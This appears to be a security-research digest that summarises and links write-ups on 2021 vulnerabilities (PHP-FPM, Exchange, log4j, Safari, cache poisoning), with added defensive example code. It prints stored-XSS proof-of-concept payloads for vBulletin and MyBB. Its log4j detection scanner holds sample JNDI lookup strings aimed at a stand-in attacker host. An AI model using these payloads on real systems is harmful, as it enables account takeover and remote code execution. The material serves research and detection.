We are pleased to present a utility developed by our researcher Philip Nikiforov for monitoring the traffic of Flutter apps.
Just make the app trust user-installed certificates by repacking it with reFlutter, then hunt bugs with Burp Suite. No root, no VPN, no more hassle!
https://github.com/ptswarm/reFlutter
Building a POC for CVE-2021-40438
👤 by Firzen
A crafted request URI path can cause mod_proxy to forward the request to an origin server chosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. The author found a way to exploit it and walks through building a proof of concept.
📝 Contents:
• The Patch
• How to exploit?
• How uds_path is being set?
• Success
• Conclusion and Remarks
https://firzen.de/building-a-poc-for-cve-2021-40438
New article: "WinRAR’s vulnerable trialware: when free software isn’t free" by our researcher Igor Sak-Sakovskiy.
In this article, we show how vulnerabilities in trialware can become a gateway for attackers.
https://swarm.ptsecurity.com/winrars-vulnerable-trialware-when-free-software-isnt-free/
PHP-FPM Local Root Vulnerability
👤 by Charles Fol
PHP-FPM (FastCGI Process Manager) is the official PHP FastCGI server. It is used in conjunction with an HTTP server such as Apache or NGINX to handle the processing of PHP files. It generally listens for connections over either a UNIX socket or on TCP port 9000. When the HTTP server needs to run a PHP file, it will forward parameters, such as the file path, PHP variables, and configuration to PHP-FPM, which will send back a response.
A low-privilege process can read and write an array of pointers used by the main process, running as root, through shared memory. An attacker can leverage this problem to change a 32-bit integer from zero to one in the main process's memory, or clear a memory region. By leveraging the primitive multiple times, it is possible to reach another bug, make the main process execute code, and thus escalate privileges.
Due to the growing adoption of NGINX instead of Apache, a good look at PHP-FPM was in order. An oversight in the design of the shared memory region led to half-decent exploitation primitives, which in turn led to a root privilege escalation.
📝 Contents:
• Introduction
• Overview of the bug
• Overview of PHP-FPM
• Main process and workers
• Scoreboards
• IPC through SHM
• Process scoreboard management and the bad primitive
• An example
• Exploitation
• Tailoring the primitive
• Reaching the heap: setting catch_workers_output
• Good enough ?
• All your bases
• Persistent worker control
• Capping the number of workers
• Closed FD
• Error-free PHP
• Problem-free exploitation tactics
• Managing streams: zlog_stream
• Unreachable heap overflow
• Faking the streams, getting root
• Heap overflow
• Arbitrary write
• Demo
• Vulnerable versions
• Conclusion and Remarks
https://ambionics.io/blog/php-fpm-local-root
Ambionics: PHP-FPM local root vulnerability (CVE-2021-21703)
Discourse SNS webhook RCE
👤 by joernchen
Discourse is an open source discussion platform built for the next decade of the Internet. It can be used as a mailing list, discussion forum, long-form chat room, etc.
A validation bug in the upstream aws-sdk-sns gem can lead to RCE in Discourse via a maliciously crafted request.
https://0day.click/recipe/discourse-sns-rce/
0day.click: Discourse SNS webhook RCE
I was staring at this part of the code for way too long already:
    module Jobs
      class ConfirmSnsSubscription < ::Jobs::Base
        sidekiq_options retry: false
        def execute(args)
          return unless raw = args[:raw].presence
          return unless json = args[:json].presence
          return…
Sitecore Experience Platform Pre-Auth RCE
👤 by Shubham Shah
In this blog post, the research team details a pre-authentication RCE vulnerability that affects Sitecore XP versions from 7.5 Initial Release through Sitecore XP 8.2 Update-7.
Sitecore Experience Platform (XP) is an enterprise content management system (CMS). It is used heavily by enterprises, including many Fortune 500 companies.
The vulnerability is applicable to all Sitecore systems running affected versions, including single-instance and multi-instance environments, Managed Cloud environments, and all Sitecore server roles (Content Delivery, Content Editing, Reporting, Processing, etc.), which are exposed to the Internet.
📝 Contents:
• Intro
• What is Sitecore Experience Platform?
• Mapping out the attack surface
• Discovering the RCE
• Remediation Advice
• Conclusion
https://blog.assetnote.io/2021/11/02/sitecore-rce/
How to exploit CVE-2021-40539 on ManageEngine ADSelfService Plus
👤 by Antoine Cervoise, Wilfried Bécard
ADSS offers functionality such as managing password policies for administrators and self-service password reset/account unlock for Active Directory users.
In this article the research team explores the details of several vulnerabilities that, chained together, allow an unauthenticated attacker to execute arbitrary code on the server.
📝 Contents:
• First steps
• Authentication Bypass
• Arbitrary file upload through the API
• Arguments injection
• Chaining everything together to get code execution
• Conclusion
https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html
Zoom fixed two post-auth RCE (CVE-2021-34416, CVE-2021-34414) and remote system crash (CVE-2021-34415) in Zoom on-premise Meeting Connector found by our researchers Nikita Abramov and Egor Dimitrenko.
Advisory: https://explore.zoom.us/en/trust/security/security-bulletin/
Cisco fixed an Unauth DoS (CVE-2021-34704) in Cisco ASA and Cisco FTD found by our researcher Nikita Abramov.
A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.
Shodan: 242,070 results 🔥
Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asafdt-webvpn-dos-KSqJAKPA
Some notes about Microsoft Exchange Deserialization RCE (CVE-2021–42321)
👤 by Peterjson
Post-auth deserialization RCE in Microsoft Exchange Server 2016 and 2019. The vulnerability stems from insufficient validation of cmdlet arguments.
📝 Contents:
• Intro
• The Sink
• The Source
• Full Exploit
• Improvement
https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852
Vietnamese version: https://testbnull.medium.com/some-notes-of-microsoft-exchange-deserialization-rce-cve-2021-42321-f6750243cdcd
Exploiting CSP in Webkit to Break Authentication & Authorization
👤 by Sachin/Prakash
A bug in the CSP implementation of WebKit, the browser engine behind Safari, let an attacker steal authorization codes, access tokens or any other secrets carried in the leaked URI. This allowed attacks including, but not limited to, account takeover, CSRF and sensitive information disclosure.
📝 Contents:
• TLDR;
• Single Sign-On (SSO)
• Content Security Policy (CSP)
• CSP Violation Reports
• Root Cause of the Vulnerability
• How can this be exploited in SSO
• Responsible Disclosure to Safari
• Setting up PoC
• Playground
• Impact
• Roadblocks
• Stats
• Fixes
• Browsers' Mitigation Strategies
• Bypasses & a new 0day
• DEMO
• Key Takeaways
• Timeline
https://threatnix.io/blog/exploiting-csp-in-webkit-to-break-authentication-authorization/
threatnix.io: Exploiting CSP in Webkit to Break Authentication & Authorization
This blog post will discuss our findings that we presented in our Blackhat Europe talk titled "Exploiting CSP in Webkit to break Authentication/Authorization", a vulnerability that enabled us to take over user accounts on most of the web applications out thereby…
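The leak described above happens at the point where a browser writes a URL into a CSP violation report. Below is an added example, not code from the threatnix.io post or from WebKit: the CSP Level 2 "strip URI for reporting" rule (a cross-origin URL is reduced to its origin; a same-origin URL keeps path and query but loses its fragment), with credentials dropped as CSP3 also requires, followed by a report built with it. Hostnames and the secret values are constructed.

```python
"""
Added example (not from the threatnix.io post): the CSP Level 2 rule for
stripping a URL before it is put into a violation report, and a report
built with it. Domains and secrets below are constructed.
"""
import json
from urllib.parse import urlsplit, urlunsplit

HTTP_SCHEMES = ("http", "https")
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(url: str) -> str:
    """ASCII serialization of the URL's origin: scheme://host[:port],
    with the default port and any userinfo dropped."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    host = (p.hostname or "").lower()
    port = p.port
    if port is None or port == DEFAULT_PORTS.get(scheme):
        return f"{scheme}://{host}"
    return f"{scheme}://{host}:{port}"


def strip_url_for_reports(url: str, protected_origin: str) -> str:
    """CSP2 'strip uri for reporting': a cross-origin URL is reduced to its
    origin, so the query (?code=...) and fragment (#access_token=...) that
    an SSO redirect carries never reach the report-uri endpoint. A
    same-origin URL keeps path and query but loses fragment and userinfo."""
    p = urlsplit(url)
    if p.scheme.lower() not in HTTP_SCHEMES:
        return p.scheme.lower()              # e.g. "data", "blob"
    url_origin = origin_of(url)
    if url_origin != protected_origin:
        return url_origin
    netloc = url_origin.split("://", 1)[1]   # host[:port], no credentials
    return urlunsplit((p.scheme.lower(), netloc, p.path, p.query, ""))


def build_report(document_url: str, blocked_url: str, directive: str,
                 policy: str) -> dict:
    """The JSON body a browser POSTs to report-uri, with both URLs stripped
    relative to the protected document's origin."""
    doc_origin = origin_of(document_url)
    return {"csp-report": {
        "document-uri": strip_url_for_reports(document_url, doc_origin),
        "blocked-uri": strip_url_for_reports(blocked_url, doc_origin),
        "violated-directive": directive,
        "original-policy": policy,
    }}


if __name__ == "__main__":
    # An attacker page embeds an SSO authorize URL that redirects to the
    # victim app's callback carrying the authorization code. A conformant
    # browser reports only "https://app.example" as the blocked-uri.
    report = build_report(
        "https://attacker.example/trap#frag",
        "https://app.example/callback?code=S3CR3T#access_token=T0K3N",
        "img-src", "img-src 'none'; report-uri /collect")
    print(json.dumps(report, indent=2))
```

The attacker's report-uri endpoint is the attacker's own server, so whatever the browser puts into blocked-uri is fully visible to them; the only defence is the stripping step, which is exactly what the post found missing in WebKit for the redirected URL.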
A persistent XSS in any message in vBulletin, patched since 13 Apr 2021. The vulnerability was found by our researcher Igor Sak-Sakovskiy.
PoC: [VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO]
Advisory: https://www.vbulletin.org/forum/showthread.php?t=328715
No CVE, because of: https://twitter.com/ptswarm/status/1463883088589692930
Tweet by PT SWARM: Hey, @MITREcorp @CVEnew @CVEannounce! During the last 6 months, we have sent you around 18 CVE requests and we have no replies (not auto-replies) for all of them. We really do miss new CVEs😢
PoC for a stored XSS in MyBB < 1.8.25 (CVE-2021-27279). The vulnerability was found by our researcher Igor Sak-Sakovskiy.
Payload: [email]a@a.a?[email=a@a.a? onmouseover=alert(1) a]a[/email][/email]
Advisory: https://github.com/mybb/mybb/security/advisories/GHSA-6483-hcpp-p75w
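Both the vBulletin and the MyBB payloads above exploit the same condition: each BBCode tag handler escapes its own input and is harmless on its own, but the handlers run as separate passes, and a later pass rewrites text that an earlier pass has already bound into an HTML attribute, emitting quotes that terminate it. The toy renderer below is an added illustration of that "nested parsers condition" (the one our fuzzing article targets), not vBulletin's or MyBB's code. It uses a hypothetical [video]/[font] grammar, and the payload is the vBulletin one with the inner attribute unquoted, which is the form this grammar accepts; the hardened variant parses once into a tree and renders by context.

```python
"""
Toy BBCode renderer reproducing the "nested parsers" XSS class behind the
vBulletin and MyBB payloads above. Added illustration with a hypothetical tag
grammar, not vBulletin's or MyBB's real code.
"""
import html
import re
from html.parser import HTMLParser

# Hypothetical grammar: [video="ID"]caption[/video] puts its caption into an
# attribute; [font=NAME]text[/font] renders an element with a quoted attribute.
VIDEO_RE = re.compile(r'\[video="([^"\]]*)"\](.*?)\[/video\]', re.I | re.S)
FONT_RE = re.compile(r'\[font=([^\]]*)\](.*?)\[/font\]', re.I | re.S)

# Constructed payload in the shape of the vBulletin PoC (inner attribute unquoted).
PAYLOAD = '[video="aaa;000"]a[font=a onmouseover=alert(location) a]a[/font]a[/video]'


def render_vulnerable(bbcode: str) -> str:
    """Two independent regex passes. Each escapes its own captures and is safe
    on its own; the bug is the order: pass 2 rewrites text that pass 1 has
    already bound into a double-quoted attribute, and pass 2's output carries
    literal double quotes that terminate that attribute."""
    out = VIDEO_RE.sub(
        lambda m: f'<video data-id="{html.escape(m[1])}" '
                  f'title="{html.escape(m[2])}"></video>', bbcode)
    out = FONT_RE.sub(
        lambda m: f'<font face="{html.escape(m[1])}">{html.escape(m[2])}</font>', out)
    return out


TOKEN_RE = re.compile(r'\[(/?)(video|font)(?:="?([^\]"]*)"?)?\]', re.I)


def parse(bbcode: str):
    """Hardened approach, step 1: tokenize ONCE into a tree of
    (tag, attr, children); text is never re-scanned after this."""
    root = ("root", "", [])
    stack = [root]
    pos = 0
    for m in TOKEN_RE.finditer(bbcode):
        if m.start() > pos:
            stack[-1][2].append(bbcode[pos:m.start()])
        closing, tag, attr = m[1] == "/", m[2].lower(), m[3] or ""
        if not closing:
            node = (tag, attr, [])
            stack[-1][2].append(node)
            stack.append(node)
        elif len(stack) > 1 and stack[-1][0] == tag:
            stack.pop()
        else:
            stack[-1][2].append(m[0])  # unmatched close tag: keep as text
        pos = m.end()
    if pos < len(bbcode):
        stack[-1][2].append(bbcode[pos:])
    return root


def to_text(children) -> str:
    """Flatten a subtree to plain text for contexts where markup is not
    allowed (attribute values)."""
    return "".join(c if isinstance(c, str) else to_text(c[2]) for c in children)


def render_node(node) -> str:
    """Hardened approach, step 2: render by context, escaping at output time."""
    tag, attr, children = node
    if tag == "video":
        # Attribute context: the caption is flattened, then escaped. Child
        # tags can contribute characters here but never markup.
        return (f'<video data-id="{html.escape(attr)}" '
                f'title="{html.escape(to_text(children))}"></video>')
    body = "".join(html.escape(c) if isinstance(c, str) else render_node(c)
                   for c in children)
    if tag == "font":
        return f'<font face="{html.escape(attr)}">{body}</font>'
    return body  # root


def render_hardened(bbcode: str) -> str:
    return render_node(parse(bbcode))


class _AttrCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(name for name, _ in attrs)


def event_handlers(markup: str) -> list:
    """Names of on* attributes a browser-like tokenizer sees in the markup."""
    p = _AttrCollector()
    p.feed(markup)
    p.close()
    return [a for a in p.attrs if a.startswith("on")]


if __name__ == "__main__":
    for render in (render_vulnerable, render_hardened):
        out = render(PAYLOAD)
        print(render.__name__, event_handlers(out), out)
```

event_handlers() tokenizes the output with html.parser the way a browser would, so the check is on which attribute names actually land on the element, not on a substring match. The fix is not more escaping but refusing to re-scan: the [video] caption is flattened with to_text() before it is escaped, so an inner tag can never emit a quote into the attribute.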
RCE 0-day exploit found in log4j, a popular Java logging package
👤 by Free Wortley, Chris Thompson
A 0-day exploit in the popular Java logging library log4j was discovered that results in remote code execution (RCE) when a certain string is logged. This post provides resources to understand the vulnerability and how to mitigate it.
📝 Contents:
• Who is impacted?
• Affected Apache log4j Versions
• Temporary Mitigations
• How the exploit works
• Exploit Requirements
• Example Vulnerable Code
• Exploit Steps
• How you can prevent future attacks
https://www.lunasec.io/docs/blog/log4j-zero-day/
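Because the trigger is "a certain string being logged", the first thing a SOC needs is a detector for that string that survives the obfuscations seen in the wild (nested ${lower:...}/${upper:...} lookups, ${::-x} default-value tricks, percent-encoding). The following is an added example, not code from the LunaSec post: it collapses nested lookups from the inside out and scans constructed nginx-style access-log lines. Lookups it cannot resolve offline are left in place, so the JNDI pattern is matched on the normalized text.

```python
"""
Added example (not from the LunaSec post): detection of the log4j JNDI
lookup string over constructed access-log lines, with the nested-lookup
obfuscations collapsed first so that ${${lower:j}ndi:...} is caught too.
"""
import re
from urllib.parse import unquote

# Innermost lookup: a ${...} whose body contains no further ${ or }.
INNER = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)

# Constructed nginx-style access log; 198.51.100.7 plays the attacker's LDAP/RMI host.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://198.51.100.7/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=${${upper:j}${lower:N}di:${env:NOPE:-l}dap://198.51.100.7/a} HTTP/1.1" 200 1 "-" "-"',
]


def resolve_inner(body: str):
    """Resolve the subset of Log4j lookup syntax that attackers use for
    obfuscation. Returns None for lookups that cannot be resolved offline
    (jndi:, env: without a default, ...), which are left in place."""
    if body.lstrip().lower().startswith("jndi"):
        return None                           # the thing we are looking for
    if ":-" in body:                          # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep and kind.strip().lower() == "lower":
        return arg.lower()
    if sep and kind.strip().lower() == "upper":
        return arg.upper()
    return None


def normalize(s: str, max_rounds: int = 32) -> str:
    """Percent-decode (twice, for double-encoded query strings), then
    collapse nested lookups from the inside out until nothing changes."""
    s = unquote(unquote(s))
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            resolved = resolve_inner(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        s = INNER.sub(repl, s)
        if not changed:
            break
    return s


def scan(lines):
    """(line index, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((i, norm))
    return hits


if __name__ == "__main__":
    for i, norm in scan(SAMPLE_LOG):
        print(i, norm)
```

Only lower/upper and the default-value form are resolved; other lookup prefixes (sys:, date:, ...) stay in the text, so a cheap backstop rule is to alert on any ${ in request data at all. Detection is triage, not protection: the logging host is the one that reaches out to the attacker, so upgrade log4j as the post's mitigation section describes.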
Cache Poisoning at Scale
👤 by Youstin
Even though web cache poisoning has been around for years, the increasing complexity of technology stacks constantly introduces unexpected behaviour that can be abused to achieve novel cache poisoning attacks. In this paper the author presents the techniques he used to report over 70 cache poisoning vulnerabilities to various bug bounty programs.
📝 Contents:
• Backstory
• Incorrect Handling of the URL Fragment in Apache Traffic Server (CVE-2021-27577)
• GitHub CP-DoS
• GitLab CP-DoS
• X-Forwarded-Scheme - Rack Middleware
• CP-DoS on Hackerone.com static files
• Single request DoS of www.shopify.com
• Stored XSS on 21 subdomains
• Cloudflare and Storage Buckets
• S3 Bucket
• Azure Storage
• Fastly Host header injection
• Injecting Keyed Parameters
• User Agent Rules
• Illegal Header Fields
• Finding New Headers
• Common headers
• Conclusion
https://youst.in/posts/cache-poisoning-at-scale/
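The common thread in the list above is an unkeyed input: something in the request that changes the response but is not part of the cache key, so one attacker request decides what every later user gets. The toy below is an added example, not from the paper, in the shape of its X-Forwarded-Scheme case: an origin that trusts that header and answers a redirect to https (i.e. to the same URL) is placed behind a cache keyed on path only; a single poisoning request then turns the path into a redirect loop for everyone. Two fixes are shown, keying on the header and stripping it at the edge. Hostnames are constructed.

```python
"""
Added example (not from the paper): a toy shared cache in front of an origin
that trusts X-Forwarded-Scheme, showing how an unkeyed request header turns
into a cache-poisoning DoS, and two ways to close it. Hostnames are constructed.
"""
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class Response:
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


def origin(path: str, headers: dict) -> Response:
    """Origin behind a TLS-terminating proxy. Like an SSL-enforcing
    middleware, it believes X-Forwarded-Scheme and redirects any request
    that claims to be plain HTTP to the https URL, i.e. to itself."""
    if headers.get("x-forwarded-scheme", "https").lower() != "https":
        return Response(301, {"location": f"https://app.example{path}"})
    return Response(200, {"content-type": "text/html"}, f"<h1>{path}</h1>")


class Cache:
    """Shared cache keyed on the path plus whatever headers are listed in
    keyed_headers. Headers in dropped_headers are removed at the edge before
    the request is keyed or forwarded."""

    def __init__(self, keyed_headers=(), dropped_headers=()):
        self.keyed_headers = tuple(h.lower() for h in keyed_headers)
        self.dropped_headers = {h.lower() for h in dropped_headers}
        self.store = {}

    def get(self, path: str, headers: dict) -> Response:
        headers = {k.lower(): v for k, v in headers.items()
                   if k.lower() not in self.dropped_headers}
        key = (path,) + tuple(headers.get(h, "") for h in self.keyed_headers)
        if key not in self.store:
            self.store[key] = origin(path, headers)   # cache miss: ask origin
        return self.store[key]


def victim_status(cache: Cache, path: str) -> int:
    """Attacker primes the cache with the unkeyed header, then an ordinary
    user requests the same path without it."""
    cache.get(path, {"X-Forwarded-Scheme": "http"})
    return cache.get(path, {}).status


def hops_until_content(cache: Cache, path: str, max_hops: int = 5) -> int:
    """Redirects an ordinary client follows after the poisoning; a poisoned
    cache hands back the same 301 to the same URL on every hop."""
    cache.get(path, {"X-Forwarded-Scheme": "http"})
    hops = 0
    while hops < max_hops:
        resp = cache.get(path, {})
        if resp.status != 301:
            break
        path = urlsplit(resp.headers["location"]).path
        hops += 1
    return hops


if __name__ == "__main__":
    print("path-only key:", victim_status(Cache(), "/static/app.js"))
    print("header in key:", victim_status(
        Cache(keyed_headers=["X-Forwarded-Scheme"]), "/static/app.js"))
    print("header stripped:", victim_status(
        Cache(dropped_headers=["X-Forwarded-Scheme"]), "/static/app.js"))
```

Keying on the header (what a Vary: X-Forwarded-Scheme response would make a real cache do) stops the cross-user effect but still lets an attacker fill the cache with variants; stripping or overwriting the header at the edge, so the origin only ever sees the value the proxy itself sets, removes the input entirely and is the better fix.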
New article "Fuzzing for XSS via nested parsers condition" by our researcher @Psych0tr1a.
This technique allowed us to find a bunch of vulnerabilities in popular web products that no one had noticed before!
https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/
Our research "Fuzzing for XSS via nested parsers condition" is in the Top 10 Web Hacking Techniques of 2021 nomination list. Don't forget to vote for us if you enjoyed the technique 😜
Link for voting: https://portswigger.net/polls/top-10-web-hacking-techniques-2021
Hacking the Apple Webcam (again)
👤 by Ryan Pickren
Gaining unauthorized camera access via a Safari UXSS. The research produced four 0-day bugs (CVE-2021-30861, CVE-2021-30975, and two without CVEs), two of which were used in the camera hack.
📝 Contents:
• Summary
• Background
• The Attack Plan
• Exploration of custom URI Schemes
• Exploit Requirements
• ShareBear Application
• Bonus Bug: Iframe Sandbox Escape
• Quarantine and Gatekeeper
• Shortcuts
• Full Chain
• Remediation
• Bonus Material (#1)
• Bonus Material (#2)
• Conclusion
https://www.ryanpickren.com/safari-uxss
Ryan Pickren: Webcam Hacking (again) - Safari UXSS
$100,500 Apple Bug Bounty for hacking the webcam via a Safari Universal Cross-Site Scripting (UXSS) bug. CVE-2021-30861, CVE-2021-30975